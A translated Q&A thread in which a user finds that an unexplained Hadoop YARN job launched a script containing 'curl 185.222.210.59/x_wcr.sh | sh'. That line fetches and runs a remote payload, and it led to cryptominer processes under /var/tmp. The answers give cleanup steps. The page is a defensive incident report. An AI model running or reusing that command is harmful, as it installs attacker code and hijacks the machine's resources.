即使重新安装我的电脑,似乎纱线也被木马感染了?

时间:2018-05-25 02:30:08

标签: yarn trojan

每次当我开始我的纱线时,我都会找到一个无法完成的任务请求,但我无法得到任何关于它的日志,我没有发现任何错误。 我在temp目录中找到了一个名为launch_container.sh的文件,如下所示:

enter code here#!/bin/bash


export NM_HTTP_PORT="8042"

export LOCAL_DIRS="/home/ubuntu/hadoop/tmp/nm-local-dir/usercache/dr.who/appcache/application_1527211944644_0001"

export HADOOP_COMMON_HOME="/root/hadoop-2.8.3"

export JAVA_HOME="/usr/lib/jvm/java-1.7.0-openjdk-1.7.0.181-2.6.14.8.el7_5.x86_64/jre"

export NM_AUX_SERVICE_mapreduce_shuffle="AAA0+gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

"

export HADOOP_YARN_HOME="/root/hadoop-2.8.3"

export HADOOP_TOKEN_FILE_LOCATION="/home/ubuntu/hadoop/tmp/nm-local-dir/usercache/dr.who/appcache/application_1527211944644_0001/container_1527211944644_0001_02_000001/container_tokens"

export NM_HOST="VM_0_11_centos"

export APPLICATION_WEB_PROXY_BASE="/proxy/application_1527211944644_0001"

export JVM_PID="$$"

export USER="dr.who"

export HADOOP_HDFS_HOME="/root/hadoop-2.8.3"

export PWD="/home/ubuntu/hadoop/tmp/nm-local-dir/usercache/dr.who/appcache/application_1527211944644_0001/container_1527211944644_0001_02_000001"

export CONTAINER_ID="container_1527211944644_0001_02_000001"

export HOME="/home/"

export NM_PORT="44381"

export LOGNAME="dr.who"

export APP_SUBMIT_TIME_ENV="1527212057989"

export MAX_APP_ATTEMPTS="2"

export HADOOP_CONF_DIR="/root/hadoop-2.8.3/etc/hadoop"

export MALLOC_ARENA_MAX="4"

export LOG_DIRS="/root/hadoop-2.8.3/logs/userlogs/application_1527211944644_0001/container_1527211944644_0001_02_000001"

exec /bin/bash -c "curl 185.222.210.59/x_wcr.sh | sh"

hadoop_shell_errorcode=$?

if [ $hadoop_shell_errorcode -ne 0 ]

then

  exit $hadoop_shell_errorcode

fi

我发现它会从网站上下载一些东西,我已经将我的电脑从ubuntu重新安装到了centos,虽然我在其他计算机上找不到同样的问题,但这个问题仍然存在。这个问题是正常的还是木马? 请提供一些有关如何解决此问题的提示,谢谢。 它与此网站“http://ist-deacuna-s1.syr.edu:8088/cluster/apps

相同

关闭wget端口后生成这种情况,当我打开wget端口时,它会添加jps无法看到的会话,只需通过命令进行观察

ps -ef|grep java
ubuntu    7484     1 97 07:16 ?        00:01:58 /var/tmp/java -c /var/tmp/w.conf
ubuntu    7496     1 96 07:16 ?        00:01:57 /var/tmp/java -c /var/tmp/w.conf

这两个会话总是保存我的所有cpu。

2 个答案:

答案 0 :(得分:3)

这是一个黑客......他们把一个矿工放在你的机器上。我有同样的事情,这里是如何摆脱它。他们创建了一个cron作业来执行远程sh文件到" install"如果你删除它。必须先删除。我找到了我的

/var/spool/cron

然后你可以删除整个/ var / tmp /目录。然后杀死有问题的pids。用

找到它们
ps -Af | grep /tmp/

我试图找出他们如何能够访问我们的机器来安装它。

答案 1 :(得分:0)

你能用--version检查文件/ var / tmp / java吗?有同样的问题。建议您找到XMRig